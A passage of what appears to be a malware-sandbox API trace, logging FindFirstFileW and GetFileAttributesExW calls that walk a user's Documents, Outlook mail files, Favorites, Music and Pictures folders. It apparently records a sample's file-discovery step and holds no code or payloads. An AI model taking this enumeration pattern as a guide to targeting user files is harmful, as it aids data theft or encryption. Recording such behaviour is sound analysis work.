lpFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\R5U2yAni5mnaARfFIO.ods" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\r5u2yani5mnaarffio.ods"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa96cd6f0, ftCreationTime.dwHighDateTime=0x1d41e01, ftLastAccessTime.dwLowDateTime=0x77d86d70, ftLastAccessTime.dwHighDateTime=0x1d412da, ftLastWriteTime.dwLowDateTime=0x77d86d70, ftLastWriteTime.dwHighDateTime=0x1d412da, nFileSizeHigh=0x0, nFileSizeLow=0xa90)) returned 1 [0043.899] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\twwqX CICS9bp4njP.ods" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\twwqx cics9bp4njp.ods"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f4fc000, ftCreationTime.dwHighDateTime=0x1d418e2, ftLastAccessTime.dwLowDateTime=0xe1efdca0, ftLastAccessTime.dwHighDateTime=0x1d41de0, ftLastWriteTime.dwLowDateTime=0xe1efdca0, ftLastWriteTime.dwHighDateTime=0x1d41de0, nFileSizeHigh=0x0, nFileSizeLow=0x17d1)) returned 1 [0043.899] FindClose (in: hFindFile=0x2981c0 | out: hFindFile=0x2981c0) returned 1 [0043.899] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\UJav8zr riHfGVLNl.docx" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\ujav8zr rihfgvlnl.docx"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x629ea0d0, ftCreationTime.dwHighDateTime=0x1d41bc4, ftLastAccessTime.dwLowDateTime=0xdab6b030, ftLastAccessTime.dwHighDateTime=0x1d41b01, ftLastWriteTime.dwLowDateTime=0xdab6b030, ftLastWriteTime.dwHighDateTime=0x1d41b01, nFileSizeHigh=0x0, nFileSizeLow=0x14455)) returned 1 [0043.899] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0043.900] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\documents\\outlook files\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x29a840 [0043.902] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\outlook files\\feasf@efw.com.pst" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\feasf@efw.com.pst"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74e91a80, ftCreationTime.dwHighDateTime=0x1d2fb32, ftLastAccessTime.dwLowDateTime=0x74e91a80, ftLastAccessTime.dwHighDateTime=0x1d2fb32, ftLastWriteTime.dwLowDateTime=0x22d91e60, ftLastWriteTime.dwHighDateTime=0x1d2fb33, nFileSizeHigh=0x0, nFileSizeLow=0x42400)) returned 1 [0043.903] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\outlook files\\Outlook Data File - mail.pst" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\outlook data file - mail.pst"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf60f53c0, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0xf60f53c0, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0xf61d9c00, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x42400)) returned 1 [0043.904] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0043.904] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\owsONdl-Vmj8Rfxu.docx" (normalized: "c:\\users\\eebsym5\\documents\\owsondl-vmj8rfxu.docx"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x326d52b0, ftCreationTime.dwHighDateTime=0x1d3fd76, ftLastAccessTime.dwLowDateTime=0xd2c0d1a0, ftLastAccessTime.dwHighDateTime=0x1d42171, ftLastWriteTime.dwLowDateTime=0xd2c0d1a0, ftLastWriteTime.dwHighDateTime=0x1d42171, nFileSizeHigh=0x0, nFileSizeLow=0x16cd5)) returned 1 [0043.904] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\Q8PRpUC.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\q8prpuc.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ca73460, ftCreationTime.dwHighDateTime=0x1d3c749, ftLastAccessTime.dwLowDateTime=0xe9cedbb0, ftLastAccessTime.dwHighDateTime=0x1d3c83b, ftLastWriteTime.dwLowDateTime=0xe9cedbb0, ftLastWriteTime.dwHighDateTime=0x1d3c83b, nFileSizeHigh=0x0, nFileSizeLow=0x90e4)) returned 1 [0043.905] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\R2t5PJlrNIbNzAPi.pptx" (normalized: "c:\\users\\eebsym5\\documents\\r2t5pjlrnibnzapi.pptx"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41cb1ba0, ftCreationTime.dwHighDateTime=0x1d402f5, ftLastAccessTime.dwLowDateTime=0x2dc69bf0, ftLastAccessTime.dwHighDateTime=0x1d3c1f7, ftLastWriteTime.dwLowDateTime=0x2dc69bf0, ftLastWriteTime.dwHighDateTime=0x1d3c1f7, nFileSizeHigh=0x0, nFileSizeLow=0x90bc)) returned 1 [0043.905] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\rQJB97cMz9uLb sUcGr.docx" (normalized: "c:\\users\\eebsym5\\documents\\rqjb97cmz9ulb sucgr.docx"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb507fc0, ftCreationTime.dwHighDateTime=0x1d3d714, ftLastAccessTime.dwLowDateTime=0xf8873e0, ftLastAccessTime.dwHighDateTime=0x1d3c7c2, ftLastWriteTime.dwLowDateTime=0xf8873e0, ftLastWriteTime.dwHighDateTime=0x1d3c7c2, nFileSizeHigh=0x0, nFileSizeLow=0xd521)) returned 1 [0043.905] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\r_FEv.pptx" (normalized: "c:\\users\\eebsym5\\documents\\r_fev.pptx"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c2fae60, ftCreationTime.dwHighDateTime=0x1d41663, ftLastAccessTime.dwLowDateTime=0x9b476110, ftLastAccessTime.dwHighDateTime=0x1d42100, ftLastWriteTime.dwLowDateTime=0x9b476110, ftLastWriteTime.dwHighDateTime=0x1d42100, nFileSizeHigh=0x0, nFileSizeLow=0x15cb1)) returned 1 [0043.906] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\vJ222xuqmnMBs.pptx" (normalized: "c:\\users\\eebsym5\\documents\\vj222xuqmnmbs.pptx"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdbd400, ftCreationTime.dwHighDateTime=0x1d3e807, ftLastAccessTime.dwLowDateTime=0x11366940, ftLastAccessTime.dwHighDateTime=0x1d3c9f7, ftLastWriteTime.dwLowDateTime=0x11366940, ftLastWriteTime.dwHighDateTime=0x1d3c9f7, nFileSizeHigh=0x0, nFileSizeLow=0x7516)) returned 1 [0043.906] FindClose (in: hFindFile=0x2897f8 | out: hFindFile=0x2897f8) returned 1 [0043.906] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\downloads\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x2897f8 [0043.907] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\downloads\\desktop.ini" (normalized: "c:\\users\\eebsym5\\downloads\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec4346c0, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x11a)) returned 1 [0043.907] FindClose (in: hFindFile=0x2897f8 | out: hFindFile=0x2897f8) returned 1 [0043.907] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\favorites\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x2897f8 [0043.907] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\favorites\\desktop.ini" (normalized: "c:\\users\\eebsym5\\favorites\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec40e560, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x192)) returned 1 [0043.908] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\favorites\\links\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x29a840 [0043.908] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\favorites\\links\\desktop.ini" (normalized: "c:\\users\\eebsym5\\favorites\\links\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0x78028160, ftLastWriteTime.dwHighDateTime=0x1d2f584, nFileSizeHigh=0x0, nFileSizeLow=0x50)) returned 1 [0043.909] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\favorites\\links\\Suggested Sites.url" (normalized: "c:\\users\\eebsym5\\favorites\\links\\suggested sites.url"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cfe16b0, ftCreationTime.dwHighDateTime=0x1d2da19, ftLastAccessTime.dwLowDateTime=0x7cfe16b0, ftLastAccessTime.dwHighDateTime=0x1d2da19, ftLastWriteTime.dwLowDateTime=0x7d3737b0, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0xec)) returned 1 [0043.909] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\favorites\\links\\Web Slice Gallery.url" (normalized: "c:\\users\\eebsym5\\favorites\\links\\web slice gallery.url"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd3a0830, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0xe2)) returned 1 [0043.910] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0043.910] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\favorites\\msn websites\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x29a840 [0043.922] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Autos.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn autos.url"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2e2150, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0043.923] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Entertainment.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn entertainment.url"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2e2150, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0043.924] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Money.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn money.url"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2e2150, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0043.924] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Sports.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn sports.url"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2e2150, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0043.925] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn.url"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2e2150, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0043.925] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSNBC News.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msnbc news.url"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2e2150, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0043.926] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0043.926] FindClose (in: hFindFile=0x2897f8 | out: hFindFile=0x2897f8) returned 1 [0043.926] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\links\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x2897f8 [0043.926] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\links\\desktop.ini" (normalized: "c:\\users\\eebsym5\\links\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x8ebeb90, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ebeb90, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec4a6ae0, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x244)) returned 1 [0043.930] FindClose (in: hFindFile=0x2897f8 | out: hFindFile=0x2897f8) returned 1 [0043.930] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\local settings\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.930] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\music\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x2897f8 [0043.931] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\music\\desktop.ini" (normalized: "c:\\users\\eebsym5\\music\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ebeb90, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ebeb90, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec40e560, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x1f8)) returned 1 [0043.932] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\music\\xs-38sjafzhkpgn\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x29a840 [0043.932] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0043.933] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\music\\yqjhy4\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x29a840 [0043.933] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\music\\yqjhy4\\-yjgr31qu\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x2981c0 [0043.934] FindClose (in: hFindFile=0x2981c0 | out: hFindFile=0x2981c0) returned 1 [0043.934] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\music\\yqjhy4\\jw3cppnrlwpcgwttt\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x2981c0 [0043.935] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\music\\yqjhy4\\jw3cppnrlwpcgwttt\\gw3stx7pa\\\\*", lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0x287e88 [0043.936] FindClose (in: hFindFile=0x287e88 | out: hFindFile=0x287e88) returned 1 [0043.936] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\music\\yqjhy4\\jw3cppnrlwpcgwttt\\kgbhdpa fz7kcy45q\\\\*", lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0x287e88 [0043.937] FindClose (in: hFindFile=0x287e88 | out: hFindFile=0x287e88) returned 1 [0043.937] FindClose (in: hFindFile=0x2981c0 | out: hFindFile=0x2981c0) returned 1 [0043.938] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0043.938] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\music\\yriklxdyrgqf\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x29a840 [0043.939] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0043.939] FindClose (in: hFindFile=0x2897f8 | out: hFindFile=0x2897f8) returned 1 [0043.939] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\my documents\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.939] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\nethood\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.939] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\NTUSER.DAT" (normalized: "c:\\users\\eebsym5\\ntuser.dat"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x8e4c770, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x51cec710, ftLastAccessTime.dwHighDateTime=0x1d4201c, ftLastWriteTime.dwLowDateTime=0x51cec710, ftLastWriteTime.dwHighDateTime=0x1d4201c, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0043.941] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\ntuser.ini" (normalized: "c:\\users\\eebsym5\\ntuser.ini"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x8e4c770, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8e4c770, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0x19e18206, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x14)) returned 1 [0043.941] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\pictures\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x2897f8 [0043.942] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ebeb90, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ebeb90, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec3e8400, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x1f8)) returned 1 [0043.942] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x29a840 [0043.942] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\09B4wyIx9zT33.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\09b4wyix9zt33.bmp"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53b3ab50, ftCreationTime.dwHighDateTime=0x1d41eb3, ftLastAccessTime.dwLowDateTime=0xb99cd710, ftLastAccessTime.dwHighDateTime=0x1d41bf8, ftLastWriteTime.dwLowDateTime=0xb99cd710, ftLastWriteTime.dwHighDateTime=0x1d41bf8, nFileSizeHigh=0x0, nFileSizeLow=0x138c5)) returned 1 [0043.943] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\3M8AoFu FfCq8.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\3m8aofu ffcq8.jpg"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1586c40, ftCreationTime.dwHighDateTime=0x1d41dc0, ftLastAccessTime.dwLowDateTime=0x543d8a80, ftLastAccessTime.dwHighDateTime=0x1d41e60, ftLastWriteTime.dwLowDateTime=0x543d8a80, ftLastWriteTime.dwHighDateTime=0x1d41e60, nFileSizeHigh=0x0, nFileSizeLow=0x1739f)) returned 1 [0043.943] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\sjnaud-t-r sr-gm\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x2981c0 [0043.943] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\sjnaud-t-r sr-gm\\AwGsNOF2F.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\sjnaud-t-r sr-gm\\awgsnof2f.bmp"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb0d62b0, ftCreationTime.dwHighDateTime=0x1d410a2, ftLastAccessTime.dwLowDateTime=0xc704c700, ftLastAccessTime.dwHighDateTime=0x1d41ce3, ftLastWriteTime.dwLowDateTime=0xc704c700, ftLastWriteTime.dwHighDateTime=0x1d41ce3, nFileSizeHigh=0x0, nFileSizeLow=0x5a83)) returned 1 [0043.944] FindClose (in: hFindFile=0x2981c0 | out: hFindFile=0x2981c0) returned 1 [0043.944] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\TYtHubl15vW1yOtrB.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\tythubl15vw1yotrb.bmp"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5128100, ftCreationTime.dwHighDateTime=0x1d41cf0, ftLastAccessTime.dwLowDateTime=0x2a4c7560, ftLastAccessTime.dwHighDateTime=0x1d41140, ftLastWriteTime.dwLowDateTime=0x2a4c7560, ftLastWriteTime.dwHighDateTime=0x1d41140, nFileSizeHigh=0x0, nFileSizeLow=0x824c)) returned 1 [0043.944] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\xk3lfx7vjftgja\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x2981c0 [0043.945] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\xk3lfx7vjftgja\\BrZ8p4yXJzyKTivHgC.png" (normalized: "c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\xk3lfx7vjftgja\\brz8p4yxjzyktivhgc.png"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x428052e0, ftCreationTime.dwHighDateTime=0x1d41e75, ftLastAccessTime.dwLowDateTime=0xdf8dfe90, ftLastAccessTime.dwHighDateTime=0x1d4146e, ftLastWriteTime.dwLowDateTime=0xdf8dfe90, ftLastWriteTime.dwHighDateTime=0x1d4146e, nFileSizeHigh=0x0, nFileSizeLow=0x147a6)) returned 1 [0043.945] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\xk3lfx7vjftgja\\WJCU7Gtt0.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\icjhltlsgmve5es\\xk3lfx7vjftgja\\wjcu7gtt0.jpg"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc227d80, ftCreationTime.dwHighDateTime=0x1d41e28, ftLastAccessTime.dwLowDateTime=0x14d64190, ftLastAccessTime.dwHighDateTime=0x1d41580, ftLastWriteTime.dwLowDateTime=0x14d64190, ftLastWriteTime.dwHighDateTime=0x1d41580, nFileSizeHigh=0x0, nFileSizeLow=0x14cd1)) returned 1 [0043.945] FindClose (in: hFindFile=0x2981c0 | out: hFindFile=0x2981c0) returned 1 [0043.945] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0043.945] FindFirstFileW (in: 